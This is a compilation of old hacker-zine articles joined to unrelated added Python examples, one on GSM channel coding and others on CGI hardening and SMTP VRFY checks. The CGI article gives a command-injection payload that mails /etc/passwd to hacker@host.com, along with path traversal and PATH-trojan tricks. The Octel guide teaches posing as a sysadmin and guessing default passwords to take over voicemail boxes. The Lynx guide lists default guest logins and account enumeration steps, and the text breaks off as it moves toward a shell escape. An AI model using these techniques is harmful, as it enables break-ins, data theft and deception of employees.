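The coding chain of section 4.3 carried through as an added example (Python written for this page; not code from the article or from the GSM specifications). It follows GSM 05.03 for the CRC polynomial, the convolutional code generators and the interleaving rule, but leaves out the bit-reordering table that 05.03 applies before the encoder, so the bit order inside a block is not the standard one; the 260-bit input frames are constructed random bits rather than codec output. The last two functions show why the diagonal interleaving matters: losing one burst costs each of two neighbouring frames 57 spread-out bits instead of wiping out a whole frame.

```python
"""TCH/FS channel coding from section 4.3 (added example; not from the article
or the GSM specs). CRC: g(D) = D^3 + D + 1 in systematic form with remainder
1 + D + D^2 (GSM 05.03 3.1.1). Convolutional code: rate 1/2, G0 = 1 + D^3 + D^4,
G1 = 1 + D + D^3 + D^4, four memory elements (3.1.2). Interleaving: the
8 x 57 diagonal rule of 3.1.3. The 05.03 bit-reordering table is omitted."""
import random

CLASS_IA, CLASS_IB, CLASS_II = 50, 132, 78      # 260 speech bits per 20 ms frame
TAIL = [0, 0, 0, 0]                             # flushes the four memory elements


def _remainder(bits):
    """Remainder of the bit polynomial (first bit = highest power) mod D^3 + D + 1."""
    reg = 0
    for b in bits:
        reg = (reg << 1) | b
        if reg & 0b1000:                        # degree-3 term present: subtract g(D)
            reg ^= 0b1011
    return reg


def crc3(class_ia):
    """Three parity bits for the 50 class Ia bits (detection only, no correction)."""
    p = _remainder(class_ia + [0, 0, 0]) ^ 0b111    # whole 53-bit word must leave 1+D+D^2
    return [(p >> 2) & 1, (p >> 1) & 1, p & 1]


def crc_ok(block53):
    """Receiver side: a failed check marks the frame bad and it is discarded."""
    return _remainder(block53) == 0b111


def conv_encode(u):
    """Rate 1/2 code: two output bits per input bit, each a parity of the current
    bit and some of the previous four (u(k) = 0 for k < 0)."""
    def d(k, i):
        return u[k - i] if k - i >= 0 else 0
    out = []
    for k in range(len(u)):
        out.append(d(k, 0) ^ d(k, 3) ^ d(k, 4))                 # G0 = 1 + D^3 + D^4
        out.append(d(k, 0) ^ d(k, 1) ^ d(k, 3) ^ d(k, 4))       # G1 = 1 + D + D^3 + D^4
    return out


def encode_frame(frame260):
    """260 speech bits -> 456 coded bits (22.8 kbps)."""
    ia = frame260[:CLASS_IA]
    ib = frame260[CLASS_IA:CLASS_IA + CLASS_IB]
    ii = frame260[CLASS_IA + CLASS_IB:]
    u = ia + crc3(ia) + ib + TAIL               # 53 + 132 + 4 = 189 bits
    return conv_encode(u) + ii                  # 378 protected + 78 unprotected


def burst_position(n, k, b0=0):
    """Burst number and bit index (0..113) that coded bit k of frame n lands in."""
    return b0 + 4 * n + k % 8, 2 * ((49 * k) % 57) + (k % 8) // 4


def to_bursts(coded_frames, b0=0):
    """Diagonal interleaving: frame n is spread over bursts b0+4n .. b0+4n+7 and
    shares each of them half-and-half with frame n-1 or n+1."""
    bursts = {}
    for n, c in enumerate(coded_frames):
        for k, bit in enumerate(c):
            burst, j = burst_position(n, k, b0)
            bursts.setdefault(burst, [None] * 114)[j] = bit
    return bursts


def from_bursts(bursts, n, b0=0):
    """De-interleave frame n; bits from a missing burst come back as None."""
    return [bursts.get(b, [None] * 114)[j]
            for b, j in (burst_position(n, k, b0) for k in range(456))]


def sample_frames(count, seed=1):
    """Constructed stand-in for codec output: random bits, not real speech."""
    rng = random.Random(seed)
    return [[rng.randrange(2) for _ in range(260)] for _ in range(count)]


if __name__ == "__main__":
    frames = sample_frames(3)
    coded = [encode_frame(f) for f in frames]
    bursts = to_bursts(coded)
    ia = frames[0][:CLASS_IA]
    print("coded bits per frame:", len(coded[0]), "bursts used:", sorted(bursts))
    print("CRC ok:", crc_ok(ia + crc3(ia)),
          "/ with one class Ia bit flipped:", crc_ok([ia[0] ^ 1] + ia[1:] + crc3(ia)))
    damaged = {b: v for b, v in bursts.items() if b != 4}       # lose one burst
    print("bits lost from frames 0 and 1:", from_bursts(damaged, 0).count(None),
          from_bursts(damaged, 1).count(None))
```

Because g(D) has a non-zero constant term, every single-bit error in the 53-bit class Ia word changes the remainder, which is the whole point of the check: such a frame is thrown away rather than played. The 49k mod 57 rule is a bijection on each of the eight sub-blocks, so a burst holds 57 bits of one frame in its even positions and 57 bits of the next frame in its odd positions.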
*Due to the intense length of this article it has been broken into 3 parts. Part 2 will be posted in NPA2*

:"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""": : EQUIBELL-ALT P DICTIONARY : : : : by : : _ __ __ ____ : : | |/ / / \ | ___ : : | / | | | |__ | : : | \ | | | __| | : : |_|\_\ \__/ |____| : """""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""

INTRODUCTION
------------
I always wished, and always will, that I would have the pleasure to own all the Bell equipment. And so I decided that I would make a checklist of all the equipment that I knew of; well, then the thought came to mind, I bet everyone else would enjoy it too. So here is a dictionary of all the Bell equipment that I know of. If I missed something, find me on dal.net in #npa, #phreaks, or wherever I am.

DICTIONARY
----------
Bell 11mm, 3/8 = A single driver, an 11mm on one end and a 3/8 on the opposite.
Bell Blue = Schematic blueprints of a specific area's wiring system.
Bell Emitter = A box that emits signals for the Bell Wireless Tester; it is a tester for the tester.
Bell Hard-Hat = Ummm... let me think...
Bell Hex = An allen wrench that has a hole drilled in the center.
Bell Lap = A piece of crap with a 1200 kbps and shit mem. Contains Bell 800 bbs #'s and other useless programs.
Bell Tester = Uses lights to represent voltages, 10-12, 0, 48, etc. Has modular and clips.
Bell Thing = A large steel piece of equipment which connects pieces of plastic holding copper wires in the center (between the 2 plastic things) ___________________________ | | |***************************| |___________________________| (cont..) thereby keeping the wires with their group & reducing "jumbled up" wiring.
Bell Wireless Tester = Uses tones to represent voltage.
DRACON = A Bell lineman's handset with attached beige. Some Dracons contain 4 extra buttons, rcl, snd, etc... Name received due to the fact that they are made by the Harris Dracon Co.
FILE WRITTEN BY: Kosmos, for NPA and for everyone that wishes to learn. REMEMBER, if I left something out, no matter what it is, find me and tell me.

Advanced CGI Exploitation Techniques
By: IsolationX

The Common Gateway Interface (CGI) is not a language of its own: it is the interface through which a web server runs an external program and hands it the request. CGI scripts are written in Perl, C, shell or anything else that can read its environment and standard input. They are normally stored in the /cgi-bin/ directory, which the server treats as executable via HTTP. When there is no /cgi-bin/ directory it is normally because the admin changed the location where the scripts are held, or the server does not support CGI. CGI is commonly used for web pages but it can be used for many more types of things. Since CGI is so common it will, of course, produce major security flaws. These flaws are normally due to an amateur scripter who knows very little about CGI and its security aspects. Thus I have decided to write an in-depth article on CGI security and the ways to exploit it. Let's begin. Let's say you stumble onto Ms. Marry's webpage and it contains the following form...
This is a simple form that asks the user to input a message, which is sent to a script called form1.pl. Let's say that the source of this script contains the following line (assume that the variables have already been parsed out of the input stream).... system("/usr/lib/sendmail -t $myaddress < $tempfile") This puts what the user has entered into a temp file, then e-mails it to Ms. Marry. Consider what you can do with this script. Here is one way you could exploit it: http...
I have just demonstrated a 'system call hole'. The "system" call in Perl spawns a Unix shell (/bin/sh -c) and, in this case, executes the commands in the 'value' field, mailing the passwd file to hacker@host.com. Just for reference, the semicolons in the 'hidden value' field act as delimiters, which separate the commands; the shell sees a single command line and has no way of knowing which part of it came from the form. Any CGI system call is inherently exploitable if not correctly coded (which it rarely is). Consider the following line of code within a CGI script... print `/usr/local/bin/finger $userinput`; This could be taken advantage of by using the same type of malicious input as before, since backticks go through the shell exactly as system() does. In general, if any of the following characters can reach a system call from user input it is most likely exploitable in some way: ; > < & * ` | $ # ( ) and the newline character. Anyway, enough on system calls, let's move on. Opening a file on a system remotely is always a plus for the hacker, so let me show you a quick example of how to get at most any file on a system by exploiting a small script. Say that you are writing a script that stores a message based on the username of the user entering it, and you add the following line to your script... open(FILE,"> /usr/local/message/data/$username"); Well, what if the user was to type in ../../../../etc/passwd as his username? The ".." components walk back out of the data directory, and because the file is opened with ">" the script truncates and writes /etc/passwd with whatever the user sent (or any other file the web server's uid can write to; if the server runs as root, that is any file at all). The same line with "<" instead of ">" would hand out read access to any file. Simple enough but very effective, need I say more...? A good trick to know off hand is to subvert the system's variables to point to a trojan horse in another directory: a command given without a full path, like finger below, is looked up along PATH, so if the script inherits a PATH you can influence, your own finger in an earlier directory is what runs. Here is a quick and pretty straightforward line of code that is vulnerable to this type of attack... system("finger $untainted_user"); Now I have been talking about the code for the CGI scripts and you are probably thinking, well, how the hell am I going to get the code for custom scripts in the first place? Let's say that Mr. Johnson just wrote a CGI script in EMACS or a similar type of editor. Well, when you write a CGI script in one of those types of editors it automatically creates a backup of the file with the extension ~.
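The two holes above, reproduced in Python beside a hardened version of each, as an added example (not the article's code). The attacker's form value, the temp-file path, the location of finger and the accepted e-mail address format are assumptions made for the demonstration; the shell-splitting function shows what /bin/sh would make of the composed command line without actually running anything.

```python
"""The two holes above, reproduced in Python beside a hardened version of each
(added example, not the article's code). Assumptions: the attacker's form value,
the temp-file path and the e-mail address format are made up for the demo."""
import os
import re
import shlex

SENDMAIL = "/usr/lib/sendmail"
MESSAGE_DIR = "/usr/local/message/data"        # directory from the open() example
FINGER = "/usr/bin/finger"                     # assumed location; full path, no PATH lookup


def vulnerable_command(myaddress, tempfile="/tmp/msg.txt"):
    """Mirror of system("/usr/lib/sendmail -t $myaddress < $tempfile"): the form
    value is pasted into one string that /bin/sh -c will parse as a command line."""
    return f"{SENDMAIL} -t {myaddress} < {tempfile}"


def shell_commands(cmdline):
    """Tokenise a command line the way sh does and split it at ; | & && ||.
    Returns the simple commands as word lists; more than one means the input
    broke out of the command the script intended to run."""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    commands, current = [], []
    for tok in lexer:
        if tok in (";", "|", "&", "&&", "||"):
            if current:
                commands.append(current)
            current = []
        else:
            current.append(tok)            # redirections (< >) stay with their command
    if current:
        commands.append(current)
    return commands


ADDRESS_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+")
USERNAME_RE = re.compile(r"[a-z_][a-z0-9_-]{0,31}")     # no '/', no '..', no leading '-'


def safe_sendmail_argv(myaddress):
    """Hardened form: allow-list the address, then pass it as one argv element.
    Run with subprocess.run(argv, stdin=open(tempfile, 'rb'), check=True): no
    shell is involved, so ; < > and friends carry no meaning."""
    if not ADDRESS_RE.fullmatch(myaddress):
        raise ValueError(f"rejected address: {myaddress!r}")
    return [SENDMAIL, "-t", myaddress]


def safe_message_path(username, base=MESSAGE_DIR):
    """Hardened form of open(FILE, "> /usr/local/message/data/$username")."""
    if not USERNAME_RE.fullmatch(username):
        raise ValueError(f"rejected username: {username!r}")
    root = os.path.realpath(base)
    path = os.path.realpath(os.path.join(root, username))   # also follows symlinks
    if os.path.commonpath([root, path]) != root:
        raise ValueError(f"{path} is outside {root}")
    return path


def finger_argv(user):
    """Hardened form of system("finger $untainted_user"): full path, so a trojan
    earlier on PATH is never run, and no leading '-' so the name cannot become
    an option."""
    if not USERNAME_RE.fullmatch(user):
        raise ValueError(f"rejected user: {user!r}")
    return [FINGER, user]


def rejects(fn, value):
    """True if fn raises ValueError for value (used by the checks below)."""
    try:
        fn(value)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    payload = "hacker@host.com; mail hacker@host.com < /etc/passwd"   # constructed
    for cmd in shell_commands(vulnerable_command(payload)):
        print("sh would run:", " ".join(cmd))
    print("hardened:", rejects(safe_sendmail_argv, payload),
          safe_sendmail_argv("marry@host.com"))
    print("traversal rejected:", rejects(safe_message_path, "../../../../etc/passwd"))
```

The allow-list does the real work in each case; the realpath check in safe_message_path is there for the symlink case the regex cannot see, and the argv list is what removes the shell from the picture. Perl's own taint mode (-T) enforces the same discipline by refusing to pass unchecked input to system(), backticks or open().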
Now that you know this (I hope you did know this before now) you can sometimes stumble upon the source of custom CGI scripts and check them for vulnerabilities: where CGI is enabled by file extension rather than by directory, form1.pl~ has no handler and is sent back as plain text instead of being run. Before I go let me say, always watch for scripts that take a file name or a command argument from the request... They can be used to view files on that system (e.g. /etc/passwd or /etc/shadow). The infamous 'phf' bug is the classic example: phf filtered the shell metacharacters but not the newline (%0a), so a request could tack "cat /etc/passwd" onto the command it ran. Anyway, keep it together. Be cool, IsolationX

D. Operating Guide For Octel Voice Mail Systems
-----------------------------------------------
Written By: De-Format

Ok... lots of companies use Octel as their voice mail OS... and it's pretty basic to operate. But there are some things within Octel that aren't well known. This file was written mainly for people who are just experimenting in the voice mail field, or who wish to pursue it, and are just starting. However, some "veteran" VMB hackers may wish to read this also; it's all you really need to know about Octel.

Table Of Contents
-----------------
1) How you know you have an Octel VMB system.
2) The complete list of Octel commands.
3) Further explanation of selected Octel options.
4) General tips.
5) How you can reach Octel.

1) How you know you have an Octel VMB system.
---------------------------------------------
Most companies only put up their 1-800 VMB system after work hours, but sometimes you'll get lucky and come across an automated system that's up 24 hours a day. So you call the 1-800 number; once you hear the greeting, press the # key. If you get some bitchy voice saying "Please Enter Your Mailbox Number", then you've probably got an Octel. (You'll recognize the voice from other places.) Now it's all up to you. There's a million and one ways you can get someone's mailbox number and sometimes even their password.
Phone up during business hours and get connected to some company worker; tell them you're the sysadmin and that the voice mail system had some sort of crash, or start asking them questions about the company and tell them you want to leave them a message. (Get their box and you're all set; you just have to hope they have a default password, or you can scan a bunch of numbers until you find some unused boxes.)

2) The complete list of Octel commands.
---------------------------------------
==============================================================================
Phone the 1-800 number. Get the intro prompt. Press #.
Enter mailbox number. Enter password.
==============================================================================
Check unheard messages      press 11.
Review saved messages       press 1.
Send a message              press 2.
Check receipt               press 3.
Personal options            press 4.
Restart                     press 5.
Exit                        press *.
==============================================================================
If you pressed 1 you go on to these options while listening to the message(s).
Position:  Rewind-1, Pause/Restart-2, Fast Forward-3.
Speed:     Slower-4, Envelope-5, Faster-6.
Volume:    Normal-8, Louder-9.
To cancel press *.  For help press 0.  To skip press #.
==============================================================================
After the message you have these options.
To replay press 4.
For the envelope press 5.
To forward a copy to another destination press 6.
To erase the message press 7.
To reply to the message, press 8.
To save the message, press 9.
To return to the main menu press *.
==============================================================================
If you pressed 2 you go on to these options after you recorded your message.
To replay the message, press 1.
If you are finished recording, press #.
Enter the destination of the message, or spell a name by pressing #.
==============================================================================
Once your destination is entered, you have these extra options.
To mark the message private press 1.
To mark the message urgent press 2.
For message received confirmation, press 3.
Future delivery press 4.
==============================================================================
Even more options after the ones directly above include:
To send, press #.
No more destinations, press *.
To confirm receipt, press 1.
To notify of non-receipt, press 2.
==============================================================================
If you press 3 you go on to this option.
Enter mailbox number or press # to spell the name.
==============================================================================
If you press 4 you get these personal options.
To turn notification ON/OFF press 1.
For administrative options, press 2.
For greetings press 3.
Notification schedule, press 4.
Mailbox forwarding, press 5.
Security options press 6.
==============================================================================
If you pressed 2 at the personal options menu, you will be at the admin menu.
Passwords press 1.
Group lists press 2.
Prompt levels press 3.
Date & time playback, press 4.
==============================================================================
If you press 1 at the admin options, these are your options.
Guest 1 (mailbox 91) press 1.
Guest 2 (mailbox 92) press 2.
Home (mailbox 93) press 3.
Secretary press 4.
Personal press 5.
==============================================================================
If you press 2 at the admin options, these are your options.
Create a group list, press 1.
Edit a group list, press 2.
Delete a group list, press 3.
List names, press 4.
==============================================================================
If you press 3 at the admin options, these are your options.
Standard prompt levels, press 1.
Extended prompt levels, press 2.
Rapid prompt levels, press 3.
==============================================================================
If you press 3 at the personal options menu, these are your options.
Personal greeting, press 1.
Extended absence, press 2.
Name, press 3.
==============================================================================
If you press 4 at the personal options menu, these are your options.
1st schedule notification, press 1.
2nd schedule notification, press 2.
Temporary notification, press 3.
==============================================================================
If you press 5 at the personal options menu, these are your options.
To establish or change forwarding destination, press 1.
To cancel forwarding destination, press 2.
==============================================================================
If you press 6 at the personal options menu, these are your options.
To turn on access security press 1.
To turn off access security press 2.
To hear the tutorial press 0.
==============================================================================

3) Further explanation of selected Octel commands.
--------------------------------------------------
Envelope Information: When you're listening to a message, or after it ends, you can obtain envelope info. If the message sender is a subscriber, you can hear the sender's name. (If the person is not on the Octel system you'll be told the message was left by an outside caller.) You'll also be told the time and date the message was sent, how long it is and whether it's urgent and/or private. If you're listening to an archived (saved) message, the time refers to when the message was archived, or sent... it all depends on how the system is set up. If you get envelope info during the message, the message will continue where you left off when the envelope info is done.
==============================================================================
Passwords: Your password can be up to 15 digits long.
The sysadmin (whose account you may be able to acquire) decides on the minimum number of digits for a password. Passwords must be different on all your boxes. (Example... if your password was 5555 then your password on one of your guest boxes can't be 5555.) If you want to find out the current password being used on a box, press 0 immediately after you identify the type of password to be changed. You can have two guest passwords, and therefore two guest mailboxes, as you already knew. You can give a guest mailbox to someone who doesn't have a legit box but whom you keep in touch with a lot. (You also have control over the guest box, so, well, if at some time you want to break the lines of communication that the person with the guest mailbox uses, you can.) Guests can only hear messages that you send them. That's not fair, is it? If you change the password on a guest mailbox, all messages still in the box are erased. Not even the system administrator can get your password. If you forgot it, then you're pretty much screwed, because you have to have your mailbox reset and, well, if you go asking he's going to wonder where in the world you came from. If you give someone a guest password they must call the system telephone number, press #, enter your mailbox number and enter the password that allows entry into his/her portion of your mailbox.
==============================================================================
Group Distribution Lists: Group lists are ok to have if you "obtain" a large number of boxes on the system and decide to be nice and give them to friends; otherwise this option is just plain useless.
==============================================================================
Notification Schedule: The notification schedule is kinda cool. You can have the system call you at any specified time frame once you receive messages. You can even set up different time schedules for different portions of the week/night/day.
Depending on where you live, the system may or may not be able to call you; it's whatever the sysadmin set it at, but if you can get his/her account, then you're set.
==============================================================================
Access Security: This option is nice to have, but if you have the IQ of a watermelon you won't need it. This option is somewhat a pain in the ass also. You have to record your name and time of day. Next time you log on it will tell you who was last on. (If the name isn't yours then you might want to sit down and think long and hard about the positive aspects of watermelons.) If you hear silence for the name and time, or the following prompt: "The last mailbox access was by recorded name and time skipped." then you just might want to change your password to something a watermelon couldn't guess, because if you do hear that then chances are someone was in on your account.
==============================================================================

4) General tips.
----------------
- If you're placing a call to the system with an AT&T calling card/calling card number, then be sure not to hit # too quickly. This may indicate to AT&T that you want to place another calling card call. Wait until the system's intro prompt is done. You can also press * to enter the system as a subscriber.
- That's about the only tip there is... everything else should be fine.

5) How you can reach Octel.
---------------------------
On the phone: 1-800-87-OCTEL
Snail Mail: Octel Communications Corporation, 1001 Murphy Ranch Road, Milpitas, California, USA 95035-7912
On the web: www.octel.com

E.
My Unix Port Handbook

Unix Ports
by (\/)@ster Y0d@

The numbers in the first table are IP protocol numbers from RFC 1700 (the Protocol field of the IP header: 1 is ICMP, 6 is TCP, 17 is UDP, 47 is GRE). They are not TCP/UDP port numbers, so a port scan will never turn up "GRE" on port 47, even though the two number spaces overlap. The services a port surfer actually connects to (finger, telnet, SMTP, HTTP and so on) live on TCP/UDP ports and are in the second table.

IP protocol numbers (IP header Protocol field, RFC 1700)
---------------------------------------------------------
Decimal  Keyword      Protocol
-------  -------      --------
0                     Reserved
1        ICMP         Internet Control Message
2        IGMP         Internet Group Management
3        GGP          Gateway-to-Gateway
4        IP           IP in IP (encapsulation)
5        ST           Stream
6        TCP          Transmission Control
7        UCL          UCL
8        EGP          Exterior Gateway Protocol
9        IGP          any private interior gateway
10       BBN-RCC-MON  BBN RCC Monitoring
11       NVP-II       Network Voice Protocol
12       PUP          PUP
13       ARGUS        ARGUS
14       EMCON        EMCON
15       XNET         Cross Net Debugger
16       CHAOS        Chaos
17       UDP          User Datagram
18       MUX          Multiplexing
19       DCN-MEAS     DCN Measurement Subsystems
20       HMP          Host Monitoring
21       PRM          Packet Radio Measurement
22       XNS-IDP      XEROX NS IDP
23       TRUNK-1      Trunk-1
24       TRUNK-2      Trunk-2
25       LEAF-1       Leaf-1
26       LEAF-2       Leaf-2
27       RDP          Reliable Data Protocol
28       IRTP         Internet Reliable Transaction
29       ISO-TP4      ISO Transport Protocol Class 4
30       NETBLT       Bulk Data Transfer Protocol
31       MFE-NSP      MFE Network Services Protocol
32       MERIT-INP    MERIT Internodal Protocol
33       SEP          Sequential Exchange Protocol
34       3PC          Third Party Connect Protocol
35       IDPR         Inter-Domain Policy Routing Protocol
36       XTP          XTP
37       DDP          Datagram Delivery Protocol
38       IDPR-CMTP    IDPR Control Message Transport Proto
39       TP++         TP++ Transport Protocol
40       IL           IL Transport Protocol
41       SIP          Simple Internet Protocol
42       SDRP         Source Demand Routing Protocol
43       SIP-SR       SIP Source Route
44       SIP-FRAG     SIP Fragment
45       IDRP         Inter-Domain Routing Protocol
46       RSVP         Reservation Protocol
47       GRE          General Routing Encapsulation
48       MHRP         Mobile Host Routing Protocol
49       BNA          BNA
50       SIPP-ESP     SIPP Encap Security Payload
51       SIPP-AH      SIPP Authentication Header
52       I-NLSP       Integrated Net Layer Security TUBA
53       SWIPE        IP with Encryption
54       NHRP         NBMA Next Hop Resolution Protocol
55-60                 Unassigned
61                    any host internal protocol
62       CFTP         CFTP
63                    any local network
64       SAT-EXPAK    SATNET and Backroom EXPAK
65       KRYPTOLAN    Kryptolan
66       RVD          MIT Remote Virtual Disk Protocol
67       IPPC         Internet Pluribus Packet Core
68                    any distributed file system
69       SAT-MON      SATNET Monitoring
70       VISA         VISA Protocol
71       IPCV         Internet Packet Core Utility
72       CPNX         Computer Protocol Network Executive
73       CPHB         Computer Protocol Heart Beat
74       WSN          Wang Span Network
75       PVP          Packet Video Protocol
76       BR-SAT-MON   Backroom SATNET Monitoring
77       SUN-ND       SUN ND PROTOCOL-Temporary
78       WB-MON       WIDEBAND Monitoring
79       WB-EXPAK     WIDEBAND EXPAK
80       ISO-IP       ISO Internet Protocol
81       VMTP         VMTP
82       SECURE-VMTP  SECURE-VMTP
83       VINES        VINES
84       TTP          TTP
85       NSFNET-IGP   NSFNET-IGP
86       DGP          Dissimilar Gateway Protocol
87       TCF          TCF
88       IGRP         IGRP
89       OSPFIGP      OSPFIGP
90       Sprite-RPC   Sprite RPC Protocol
91       LARP         Locus Address Resolution Protocol
92       MTP          Multicast Transport Protocol
93       AX.25        AX.25 Frames
94       IPIP         IP-within-IP Encapsulation Protocol
95       MICP         Mobile Internetworking Control Pro.
96       SCC-SP       Semaphore Communications Sec. Pro.
97       ETHERIP      Ethernet-within-IP Encapsulation
98       ENCAP        Encapsulation Header
99                    any private encryption scheme
100      GMTP         GMTP
101-254               Unassigned
255                   Reserved

TCP/UDP ports worth surfing
---------------------------
Port  Service        What you get
----  -------        ------------
11    systat         Active users on the system (usually disabled)
13    daytime        Time and date at that host
21    ftp            File transfer (control connection)
23    telnet         Remote login
25    smtp           Mail; EXPN/VRFY leak user names
37    time           Time as a 32-bit number
39    rlp            Resource Location Protocol
43    whois          Info on hosts, networks and people
53    domain         DNS name server (TCP for zone transfers)
70    gopher         Gopher; mostly out-of-date info
79    finger         Lots of info on users
80    http           Web server
110   pop3           Incoming e-mail
443   https          Web server over SSL
512   exec / biff    rexec (TCP) / mail notification (UDP)
513   login / who    rlogin (TCP) / rwho (UDP)
520   route          Routing Information Protocol (UDP)

The port information in this file is derived from the RFC standards. If you liked this file send your comments to mastyoda@concentric.net; if you hated this and thought it was stupid, send it to my /dev/null. The info in the text is very useful to any hacker, elite or not; everyone needs to port surf. Port surfers will love me for doing this.
(\/)@ster Y0d@

F. ------[ Using a Guest Lynx Account to Your Advantage ]----------------
******************* by Electric Nectar *****************

----------
Situation:
----------
Ok, so you're trying to get a valid account on a server for whatever reasons (busting root, taking a look around, etc.). You've tried telnetting to ports 79 and 25, got a couple of valid account names, and have tried hopelessly to just guess the passwords. This is not the approach to take.

-----------------
Method of attack:
-----------------
Throughout my experience, while trying to gain a valid account on various servers, I've run into many that run a guest lynx account. The purpose of this account is just what it sounds like: it gives no access to the server itself, but rather lets you only run lynx (a unix-based, text-only web browser). The account is designed to be accessed by outsiders. The most common lynx logins and passwords are:
-lynx/lynx
-guest/guest
-guest/lynx
-www/www
-www/lynx
Ok, well, I think you get the idea; be creative if one doesn't work. First off though, you need to make sure the account exists. Simply telnet to port 79 and type in a possible lynx account name. If finger reports the account, you're set. Now if 79 isn't open, just telnet to port 25 and type 'vrfy username', username being the name of a guest lynx account. Read the reply code: a 250 with the expanded address confirms the account, a 550 means there is no such user, and a 252 ("cannot VRFY user") means the server has been told not to answer and proves nothing either way, so a bare 252 like the one in the session below is not a verification.
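Port surfing done with the reply actually read, as an added example written for this page (not code from either article): the SMTP VRFY check just described, with the three-digit code parsed and turned into a verdict instead of eyeballed. The SMTP server in the block is a constructed stand-in talking over a socketpair so the code runs offline; it copies Sendmail's reply codes but is not Sendmail, and host.com, the user names and the greeting text are made up.

```python
"""SMTP VRFY as a port-surfing check (added example; not from either article).
The server below is a constructed stand-in, not Sendmail."""
import re
import socket
import threading


def read_reply(sock):
    """Read one SMTP reply, multi-line included; return (code, last line)."""
    buf = b""
    while True:
        chunk = sock.recv(4096)
        if not chunk:
            raise ConnectionError("server closed the connection")
        buf += chunk
        while b"\r\n" in buf:
            line, buf = buf.split(b"\r\n", 1)
            text = line.decode("ascii", "replace")
            if re.match(r"\d{3}(?: |$)", text):        # "250-" continues, "250 " ends
                return int(text[:3]), text


def smtp_vrfy(sock, user, helo="probe.example"):
    """The exchange from the article: greeting, HELO, VRFY <user>, QUIT."""
    code, text = read_reply(sock)
    if code != 220:
        raise RuntimeError(f"unexpected greeting: {text}")
    sock.sendall(f"HELO {helo}\r\n".encode())
    read_reply(sock)
    sock.sendall(f"VRFY {user}\r\n".encode())
    code, text = read_reply(sock)
    sock.sendall(b"QUIT\r\n")
    try:
        read_reply(sock)
    except ConnectionError:
        pass
    return code, text


def interpret_vrfy(code):
    """What the code really says (RFC 821 semantics, Sendmail's usual codes)."""
    if code in (250, 251):
        return "exists"            # name resolved; 250 carries the full address
    if code == 252:
        return "unverified"        # server declines to check; proves nothing
    if code in (550, 551, 553):
        return "unknown"
    if code in (500, 502):
        return "disabled"          # VRFY not implemented / switched off
    return "other"


def vrfy_over_network(host, user, port=25, timeout=5):
    """Real use: connect to port 25 of a host you are allowed to probe."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        code, text = smtp_vrfy(s, user)
    return code, interpret_vrfy(code), text


FAKE_USERS = {"lynx": "Lynx Guest Account"}       # constructed account list


def fake_sendmail(sock, users=FAKE_USERS, verify=True):
    """Constructed stand-in: 250 for known names, 550 otherwise, or 252 for every
    name when verify=False (what Sendmail does with PrivacyOptions=novrfy)."""
    sock.sendall(b"220 host.com ESMTP stand-in (not Sendmail)\r\n")
    buf = b""
    while True:
        chunk = sock.recv(1024)
        if not chunk:
            break
        buf += chunk
        while b"\r\n" in buf:
            line, buf = buf.split(b"\r\n", 1)
            verb, _, arg = line.decode("ascii", "replace").partition(" ")
            verb = verb.upper()
            if verb == "HELO":
                sock.sendall(b"250 host.com Hello\r\n")
            elif verb == "VRFY" and not verify:
                sock.sendall(b"252 Cannot VRFY user; try RCPT to attempt delivery\r\n")
            elif verb == "VRFY" and arg in users:
                sock.sendall(f"250 {users[arg]} <{arg}@host.com>\r\n".encode())
            elif verb == "VRFY":
                sock.sendall(b"550 String does not match anything\r\n")
            elif verb == "QUIT":
                sock.sendall(b"221 host.com closing connection\r\n")
                sock.close()
                return
            else:
                sock.sendall(b"500 Command unrecognized\r\n")
    sock.close()


def probe_account(user, verify=True):
    """Run smtp_vrfy against the stand-in over a socketpair (no network needed)."""
    client, server = socket.socketpair()
    client.settimeout(5)
    worker = threading.Thread(target=fake_sendmail, args=(server, FAKE_USERS, verify),
                              daemon=True)
    worker.start()
    try:
        code, text = smtp_vrfy(client, user)
    finally:
        client.close()
    worker.join(2)
    return code, interpret_vrfy(code), text


if __name__ == "__main__":
    for name in ("lynx", "nosuch"):
        print(name, probe_account(name))
    print("novrfy:", probe_account("lynx", verify=False))
```

The verify=False path is the one to keep in mind: an admin who sets Sendmail's novrfy/goaway privacy options turns every VRFY into a 252, and an attacker who treats 252 as a hit will be scanning noise. The same read_reply loop works for EXPN and for the 250/550 answers to RCPT TO, which is the fallback the 252 text itself suggests.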
Here's an example...

Finger:
Trying...
Connected to host.com
Escape character is '^]'.
lynx
Login name: lynx                        In real life: Lynx Guest Account
Directory: /home/lynx                   Shell: /usr/bin/lynx
No Plan.

Smtp:
Trying...
Connected to host.com
Escape character is '^]'.
220 host.com ESMTP Sendmail 8.8.5/8.8.2; Fri, 3 Oct 1997 19:53:40 -0400
vrfy lynx
252

-------------------
After verification:
-------------------
Now remember, a lynx guest account isn't a common thing on most servers, although I have seen it on quite a few. This is just an alternate plan for getting a shell on an otherwise inaccessible server, if the situation exists. If you cannot validate a guest lynx account, don't be surprised. Next order of business is to login, of course. It should be fairly simple. Since it is a guest lynx account, the login and password should be somewhat obvious; usually the password is the same as the login....

$ telnet host.com
Trying...
Connected to host.com
Escape character is '^]'.

Linux 2.0.29 (host.com) (ttyp0)

Welcome to Linux 2.0.29.

host login: lynx
Password:
Linux 2.0.29.
Last login: Fri Oct 3 17:11:59 on ttyp0 from ppp1.host.com
You have new mail.

---------------
Once logged in:
---------------
Ok, your terminal should look something like this...

----------------------------------------------------------------------
Lynx (default page crap here)
_________________________________________________________________
-- press space for next page --
  Arrow keys: Up and Down to move.  Right to follow a link; Left to go back.
 H)elp O)ptions P)rint G)o M)ain screen Q)uit /=search [delete]=history list
-----------------------------------------------------------------------------

Now the following trick is something I developed after several minutes of devising a plan to make lynx pop me into a bash shell. Now that you are in lynx, hit 'O' for the options menu. Ok, the options menu should come up; let's take a look at it...
-----------------------------------------------------------------------------
                    Options Menu (Lynx Version 2.6)

 E)ditor                      : NONE
 D)ISPLAY variable            : NONE
 B)ookmark file               : lynx_bookmarks.html
 F)TP sort criteria           : By Filename
 P)ersonal mail address       : NONE
 S)earching type              : CASE INSENSITIVE
 display (C)haracter set      : ISO Latin 1
 Raw 8-bit or CJK m(O)de      : ON
 preferred document lan(G)uage: en
 preferred document c(H)arset : NONE
 V)I keys                     : OFF
